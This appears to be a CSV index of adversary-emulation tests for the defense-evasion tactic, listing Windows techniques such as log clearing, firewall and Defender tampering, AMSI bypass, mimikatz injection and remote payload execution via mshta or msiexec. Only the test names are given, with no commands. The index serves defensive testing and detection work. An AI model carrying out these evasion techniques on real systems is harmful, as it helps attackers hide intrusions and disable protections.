defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,4,attrib - hide file,32b979da-7b68-42c9-9a99-0e39900fc36c,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,5,Grant Full Access to folder for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,1,Msiexec.exe - Execute Local MSI file with embedded JScript,a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,2,Msiexec.exe - Execute Local MSI file with embedded VBScript,8d73c7b0-c2b1-4ac1-881a-4aa644f76064,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,3,Msiexec.exe - Execute Local MSI file with an embedded DLL,628fa796-76c5-44c3-93aa-b9d8214fd568,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,4,Msiexec.exe - Execute Local MSI file with an embedded EXE,ed3fa08a-ca18-4009-973e-03d13014d0e8,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,5,WMI Win32_Product Class - Execute Local MSI file with embedded JScript,882082f0-27c6-4eec-a43c-9aa80bccdb30,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,6,WMI Win32_Product Class - Execute Local MSI file with embedded VBScript,cf470d9a-58e7-43e5-b0d2-805dffc05576,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,7,WMI Win32_Product Class - Execute Local MSI file with an embedded DLL,32eb3861-30da-4993-897a-42737152f5f8,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,8,WMI Win32_Product Class - Execute Local MSI file with an embedded EXE,55080eb0-49ae-4f55-a440-4167b7974f79,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,9,Msiexec.exe - Execute the DllRegisterServer function of a DLL,0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,10,Msiexec.exe - Execute the DllUnregisterServer function of a DLL,ab09ec85-4955-4f9c-b8e0-6851baf4d47f,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,11,Msiexec.exe - Execute Remote MSI file,44a4bedf-ffe3-452e-bee4-6925ab125662,command_prompt
defense-evasion,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,10,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,12,Set Custom AddToHistoryHandler to Avoid History File Logging,1d0d9aa6-6111-4f89-927b-53e8afae7f94,powershell
defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt
defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt
defense-evasion,T1562,Impair Defenses,1,Windows Disable LSA Protection,40075d5f-3a70-4c66-9125-f72bee87247d,command_prompt
defense-evasion,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,powershell
defense-evasion,T1036,Masquerading,2,Malware Masquerading and Execution from Zip File,4449c89b-ec82-43a4-89c1-91e2f1abeecc,powershell
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,1,Copy and Delete Mailbox Data on Windows,d29f01ea-ac72-4efc-8a15-bea64b77fabf,powershell
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,4,Copy and Modify Mailbox Data on Windows,edddff85-fee0-499d-9501-7d4d2892e79b,powershell
defense-evasion,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
defense-evasion,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
defense-evasion,T1055,Process Injection,3,Section View Injection,c6952f41-6cf0-450a-b352-2ca8dae7c178,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,1,mavinject - Inject DLL into running process,c426dacf-575d-4937-8611-a148a86a5e61,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,2,Register-CimProvider - Execute evil dll,ad2c17ed-f626-4061-b21e-b9804a6f3655,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,3,InfDefaultInstall.exe .inf Execution,54ad7d5a-a1b5-472c-b6c4-f8090fb2daef,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,4,ProtocolHandler.exe Downloaded a Suspicious File,db020456-125b-4c8b-a4a7-487df8afb5a2,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,5,Microsoft.Workflow.Compiler.exe Payload Execution,7cbb0f26-a4c1-4f77-b180-a009aa05637e,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,6,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,7,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,8,DiskShadow Command Execution,0e1483ba-8f0c-425d-b8c6-42736e058eaa,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,9,Load Arbitrary DLL via Wuauclt (Windows Update Client),49fbd548-49e9-4bb7-94a6-3769613912b8,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,10,Lolbin Gpscript logon option,5bcda9cd-8e85-48fa-861d-b5a85d91d48c,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,11,Lolbin Gpscript startup option,f8da74bb-21b8-4af9-8d84-f2c8e4a220e3,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,12,Lolbas ie4uinit.exe use as proxy,13c0804e-615e-43ad-b223-2dfbacd0b0b3,command_prompt
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,5,Windows - Modify file creation timestamp with PowerShell,b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c,powershell
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,6,Windows - Modify file last modified timestamp with PowerShell,f8f6634d-93e1-4238-8510-f8a90a20dcf2,powershell
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,7,Windows - Modify file last access timestamp with PowerShell,da627f63-b9bd-4431-b6f8-c5b44d061a62,powershell
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,8,Windows - Timestomp a File,d7512c33-3a75-4806-9893-69abc3ccdd43,powershell
defense-evasion,T1620,Reflective Code Loading,1,WinPwn - Reflectively load Mimik@tz into memory,56b9589c-9170-4682-8c3d-33b86ecb5119,powershell
defense-evasion,T1218.003,Signed Binary Proxy Execution: CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,Signed Binary Proxy Execution: CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,2,Disable Windows IIS HTTP Logging via PowerShell,a957fb0f-1e85-49b2-a211-413366784b1e,powershell
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,3,Kill Event Log Service Threads,41ac52ba-5d5e-40c0-b267-573ed90489bd,powershell
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,4,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,5,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,6,Disable Event Logging with wevtutil,b26a3340-dad7-4360-9176-706269c74103,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,7,Makes Eventlog blind with Phant0m,3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741,command_prompt
defense-evasion,T1218.002,Signed Binary Proxy Execution: Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,1,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,6,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,18,LockBit Black - Unusual Windows firewall registry modification -cmd,a4651931-ebbb-4cde-9363-ddf3d66214cb,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,19,LockBit Black - Unusual Windows firewall registry modification -Powershell,80b453d1-eec5-4144-bf08-613a6c3ffe12,powershell
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,20,Blackbit - Disable Windows Firewall using netsh firewall,91f348e6-3760-4997-a93b-2ceee7f254ee,command_prompt
defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
defense-evasion,T1112,Modify Registry,4,Add domain to Trusted sites Zone,cf447677-5a4e-4937-a82c-e47d254afd57,powershell
defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
defense-evasion,T1112,Modify Registry,9,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt
defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,powershell
defense-evasion,T1112,Modify Registry,11,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt
defense-evasion,T1112,Modify Registry,12,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt
defense-evasion,T1112,Modify Registry,13,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt
defense-evasion,T1112,Modify Registry,14,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt
defense-evasion,T1112,Modify Registry,15,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt
defense-evasion,T1112,Modify Registry,16,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt
defense-evasion,T1112,Modify Registry,17,Activate Windows NoDesktop Group Policy Feature,93386d41-525c-4a1b-8235-134a628dee17,command_prompt
defense-evasion,T1112,Modify Registry,18,Activate Windows NoRun Group Policy Feature,d49ff3cc-8168-4123-b5b3-f057d9abbd55,command_prompt
defense-evasion,T1112,Modify Registry,19,Activate Windows NoFind Group Policy Feature,ffbb407e-7f1d-4c95-b22e-548169db1fbd,command_prompt
defense-evasion,T1112,Modify Registry,20,Activate Windows NoControlPanel Group Policy Feature,a450e469-ba54-4de1-9deb-9023a6111690,command_prompt
defense-evasion,T1112,Modify Registry,21,Activate Windows NoFileMenu Group Policy Feature,5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4,command_prompt
defense-evasion,T1112,Modify Registry,22,Activate Windows NoClose Group Policy Feature,12f50e15-dbc6-478b-a801-a746e8ba1723,command_prompt
defense-evasion,T1112,Modify Registry,23,Activate Windows NoSetTaskbar Group Policy Feature,d29b7faf-7355-4036-9ed3-719bd17951ed,command_prompt
defense-evasion,T1112,Modify Registry,24,Activate Windows NoTrayContextMenu Group Policy Feature,4d72d4b1-fa7b-4374-b423-0fe326da49d2,command_prompt
defense-evasion,T1112,Modify Registry,25,Activate Windows NoPropertiesMyDocuments Group Policy Feature,20fc9daa-bd48-4325-9aff-81b967a84b1d,command_prompt
defense-evasion,T1112,Modify Registry,26,Hide Windows Clock Group Policy Feature,8023db1e-ad06-4966-934b-b6a0ae52689e,command_prompt
defense-evasion,T1112,Modify Registry,27,Windows HideSCAHealth Group Policy Feature,a4637291-40b1-4a96-8c82-b28f1d73e54e,command_prompt
defense-evasion,T1112,Modify Registry,28,Windows HideSCANetwork Group Policy Feature,3e757ce7-eca0-411a-9583-1c33b8508d52,command_prompt
defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt
defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
defense-evasion,T1112,Modify Registry,31,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt
defense-evasion,T1112,Modify Registry,32,Windows Powershell Logging Disabled,95b25212-91a7-42ff-9613-124aca6845a8,command_prompt
defense-evasion,T1112,Modify Registry,33,Windows Add Registry Value to Load Service in Safe Mode without Network,1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5,command_prompt
defense-evasion,T1112,Modify Registry,34,Windows Add Registry Value to Load Service in Safe Mode with Network,c173c948-65e5-499c-afbe-433722ed5bd4,command_prompt
defense-evasion,T1112,Modify Registry,35,Disable Windows Toast Notifications,003f466a-6010-4b15-803a-cbb478a314d7,command_prompt
defense-evasion,T1112,Modify Registry,36,Disable Windows Security Center Notifications,45914594-8df6-4ea9-b3cc-7eb9321a807e,command_prompt
defense-evasion,T1112,Modify Registry,37,Suppress Win Defender Notifications,c30dada3-7777-4590-b970-dc890b8cf113,command_prompt
defense-evasion,T1112,Modify Registry,38,Allow RDP Remote Assistance Feature,86677d0e-0b5e-4a2b-b302-454175f9aa9e,command_prompt
defense-evasion,T1112,Modify Registry,39,NetWire RAT Registry Key Creation,65704cd4-6e36-4b90-b6c1-dc29a82c8e56,command_prompt
defense-evasion,T1112,Modify Registry,40,Ursnif Malware Registry Key Creation,c375558d-7c25-45e9-bd64-7b23a97c1db0,command_prompt
defense-evasion,T1112,Modify Registry,41,Terminal Server Client Connection History Cleared,3448824b-3c35-4a9e-a8f5-f887f68bea21,command_prompt
defense-evasion,T1112,Modify Registry,42,Disable Windows Error Reporting Settings,d2c9e41e-cd86-473d-980d-b6403562e3e1,command_prompt
defense-evasion,T1112,Modify Registry,43,DisallowRun Execution Of Certain Applications,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
defense-evasion,T1112,Modify Registry,44,Enabling Restricted Admin Mode via Command_Prompt,fe7974e5-5813-477b-a7bd-311d4f535e83,command_prompt
defense-evasion,T1112,Modify Registry,45,Mimic Ransomware - Enable Multiple User Sessions,39f1f378-ba8a-42b3-96dc-2a6540cfc1e3,command_prompt
defense-evasion,T1112,Modify Registry,46,Mimic Ransomware - Allow Multiple RDP Sessions per User,35727d9e-7a7f-4d0c-a259-dc3906d6e8b9,command_prompt
defense-evasion,T1112,Modify Registry,47,Event Viewer Registry Modification - Redirection URL,6174be7f-5153-4afd-92c5-e0c3b7cdb5ae,command_prompt
defense-evasion,T1112,Modify Registry,48,Event Viewer Registry Modification - Redirection Program,81483501-b8a5-4225-8b32-52128e2f69db,command_prompt
defense-evasion,T1112,Modify Registry,49,Enabling Remote Desktop Protocol via Remote Registry,e3ad8e83-3089-49ff-817f-e52f8c948090,command_prompt
defense-evasion,T1112,Modify Registry,50,Disable Win Defender Notification,12e03af7-79f9-4f95-af48-d3f12f28a260,command_prompt
defense-evasion,T1112,Modify Registry,51,Disable Windows OS Auto Update,01b20ca8-c7a3-4d86-af59-059f15ed5474,command_prompt
defense-evasion,T1112,Modify Registry,52,Disable Windows Auto Reboot for current logon user,396f997b-c5f8-4a96-bb2c-3c8795cf459d,command_prompt
defense-evasion,T1112,Modify Registry,53,Windows Auto Update Option to Notify before download,335a6b15-b8d2-4a3f-a973-ad69aa2620d7,command_prompt
defense-evasion,T1112,Modify Registry,54,Do Not Connect To Win Update,d1de3767-99c2-4c6c-8c5a-4ba4586474c8,command_prompt
defense-evasion,T1112,Modify Registry,55,Tamper Win Defender Protection,3b625eaa-c10d-4635-af96-3eae7d2a2f3c,command_prompt
defense-evasion,T1112,Modify Registry,56,Snake Malware Registry Blob,8318ad20-0488-4a64-98f4-72525a012f6b,powershell
defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
defense-evasion,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
defense-evasion,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
defense-evasion,T1070.001,Indicator Removal on Host: Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
defense-evasion,T1070.001,Indicator Removal on Host: Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLog,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
defense-evasion,T1070.001,Indicator Removal on Host: Clear Windows Event Logs,3,Clear Event Logs via VBA,1b682d84-f075-4f93-9a89-8a8de19ffd6e,powershell
defense-evasion,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
defense-evasion,T1134.002,Create Process with Token,2,WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique,ccf4ac39-ec93-42be-9035-90e2f26bcd92,powershell
defense-evasion,T1218.008,Signed Binary Proxy Execution: Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
defense-evasion,T1218.008,Signed Binary Proxy Execution: Odbcconf,2,Odbcconf.exe - Load Response File,331ce274-f9c9-440b-9f8c-a1006e1fce0b,command_prompt
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,3,Disable Powershell ETW Provider - Windows,6f118276-121d-4c09-bb58-a8fb4a72ee84,powershell
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,4,Disable .NET Event Tracing for Windows Via Registry (cmd),8a4c33be-a0d3-434a-bee6-315405edbd5b,command_prompt
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,5,Disable .NET Event Tracing for Windows Via Registry (powershell),19c07a45-452d-4620-90ed-4c34fffbe758,powershell
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,6,LockBit Black - Disable the ETW Provider of Windows Defender -cmd,f6df0b8e-2c83-44c7-ba5e-0fa4386bec41,command_prompt
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,7,LockBit Black - Disable the ETW Provider of Windows Defender -Powershell,69fc085b-5444-4879-8002-b24c8e1a3e02,powershell
defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
defense-evasion,T1550.003,Use Alternate Authentication Material: Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
defense-evasion,T1550.003,Use Alternate Authentication Material: Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell
defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
defense-evasion,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,3,Remove the Zone.Identifier alternate data stream,64b12afc-18b8-4d3f-9eab-7f6cae7c73f9,powershell
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,4,Execute LNK file from ISO,c2587b8d-743d-4985-aa50-c83394eaeb68,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,4,Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement,007e5672-2088-4853-a562-7490ddc19447,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,5,Invoke HTML Application - Jscript Engine Simulating Double Click,58a193ec-131b-404e-b1ca-b35cf0b18c33,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,6,Invoke HTML Application - Direct download from URI,39ceed55-f653-48ac-bd19-aceceaf525db,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,10,Mshta used to Execute PowerShell,8707a805-2b76-4f32-b1c0-14e558205772,command_prompt
defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,4,Bad Potato,9c6d799b-c111-4749-a42f-ec2f8cb51448,powershell
defense-evasion,T1564.002,Hide Artifacts: Hidden Users,3,Create Hidden User in Registry,173126b7-afe4-45eb-8680-fa9f6400431c,command_prompt
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,2,Compiled HTML Help Remote Payload,0f8af516-9818-4172-922b-42986ef1e81d,command_prompt
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,3,Invoke CHM with default Shortcut Command Execution,29d6f0d7-be63-4482-8827-ea77126c1ef7,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,4,Invoke CHM with InfoTech Storage Protocol Handler,b4094750-5fc7-4e8e-af12-b4e36bf5e7f6,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,5,Invoke CHM Simulate Double click,5decef42-92b8-4a93-9eb2-877ddcb9401a,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,6,Invoke CHM with Script Engine and Help Topic,4f83adda-f5ec-406d-b318-9773c9ca92e5,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,7,Invoke CHM Shortcut Command with ITS and Help Topic,15756147-7470-4a83-87fb-bb5662526247,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,8,Decompile Local CHM File,20cb05e0-1fa5-406d-92c1-84da4ba01813,command_prompt
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,1,Add Network Share,14c38f32-6509-46d8-ab43-d53e32d2b131,command_prompt
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,2,Remove Network Share,09210ad5-1ef2-4077-9ad3-7351e13e9222,command_prompt
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,3,Remove Network Share PowerShell,0512d214-9512-4d22-bde7-f37e058259b3,powershell
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,4,Disable Administrative Share Creation at Startup,99c657aa-ebeb-4179-a665-69288fdd12b8,command_prompt
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,5,Remove Administrative Shares,4299eff5-90f1-4446-b2f3-7f4f5cfd5d62,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,10,Unload Sysmon Filter Driver,811b3e76-c41b-430c-ac0d-e2380bfaa164,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,11,Uninstall Sysmon,a316fb2e-5344-470d-91c1-23e15c374edc,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,12,AMSI Bypass - AMSI InitFailed,695eed40-e949-40e5-b306-b4031e4154bd,powershell
